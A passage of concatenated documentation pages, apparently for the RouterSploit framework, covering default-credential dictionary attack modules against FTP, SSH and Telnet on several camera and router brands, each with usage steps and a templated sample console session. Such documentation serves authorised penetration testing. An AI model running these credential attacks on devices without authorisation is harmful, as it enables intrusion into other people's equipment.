Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/vacron/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Vacron Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/vacron/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/vacron/telnet_default_creds rsf (Vacron Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Vacron Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/videoiq/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against VideoIQ Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/cameras/videoiq/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/videoiq/ftp_default_creds rsf (VideoIQ Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (VideoIQ Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/videoiq/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against VideoIQ Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/videoiq/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/videoiq/ssh_default_creds rsf (VideoIQ Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (VideoIQ Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/videoiq/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against VideoIQ Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/videoiq/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/videoiq/telnet_default_creds rsf (VideoIQ Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (VideoIQ Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/asmax/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Asmax Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/asmax/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/asmax/ftp_default_creds rsf (Asmax Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asmax Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/asmax/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Asmax Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/asmax/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. 
If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/asmax/ssh_default_creds rsf (Asmax Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asmax Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/asmax/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Asmax Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/asmax/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/asmax/telnet_default_creds rsf (Asmax Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asmax Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... 
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/asus/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Asus Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/asus/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/asus/ftp_default_creds rsf (Asus Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asus Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/asus/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Asus Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/asus/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/asus/ssh_default_creds rsf (Asus Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asus Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/asus/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Asus Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/asus/telnet_default_creds` 3. 
Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/asus/telnet_default_creds rsf (Asus Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asus Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/belkin/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Belkin Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/belkin/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/belkin/ftp_default_creds rsf (Belkin Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Belkin Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... 
[-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/belkin/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Belkin Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/belkin/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/belkin/ssh_default_creds rsf (Belkin Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Belkin Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/belkin/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Belkin Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/belkin/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/belkin/telnet_default_creds rsf (Belkin Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Belkin Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/bhu/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Bhu Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/routers/bhu/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/bhu/ftp_default_creds rsf (Bhu Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Bhu Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/bhu/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Bhu Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/bhu/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/bhu/ssh_default_creds rsf (Bhu Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Bhu Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... 
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/bhu/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Bhu Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/bhu/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/bhu/telnet_default_creds rsf (Bhu Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Bhu Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/billion/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Billion Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/billion/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/billion/ftp_default_creds rsf (Billion Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Billion Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/billion/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Billion Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/billion/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. 
If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/billion/ssh_default_creds rsf (Billion Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Billion Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/billion/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Billion Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/billion/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/billion/telnet_default_creds rsf (Billion Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Billion Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... 
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/cisco/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Cisco Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/cisco/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/cisco/ftp_default_creds rsf (Cisco Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/cisco/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Cisco Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/cisco/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/cisco/ssh_default_creds rsf (Cisco Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/cisco/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Cisco Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/cisco/telnet_default_creds` 3. 
Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/cisco/telnet_default_creds rsf (Cisco Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/comtrend/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Comtrend Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/comtrend/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/comtrend/ftp_default_creds rsf (Comtrend Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Comtrend Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... 
[-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/comtrend/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Comtrend Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/comtrend/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/comtrend/ssh_default_creds rsf (Comtrend Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Comtrend Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/comtrend/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Comtrend Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/comtrend/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/comtrend/telnet_default_creds rsf (Comtrend Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Comtrend Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/routers/dlink/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against D-Link Router FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/routers/dlink/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/dlink/ftp_default_creds rsf (D-Link Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/routers/dlink/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against D-Link Router SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start 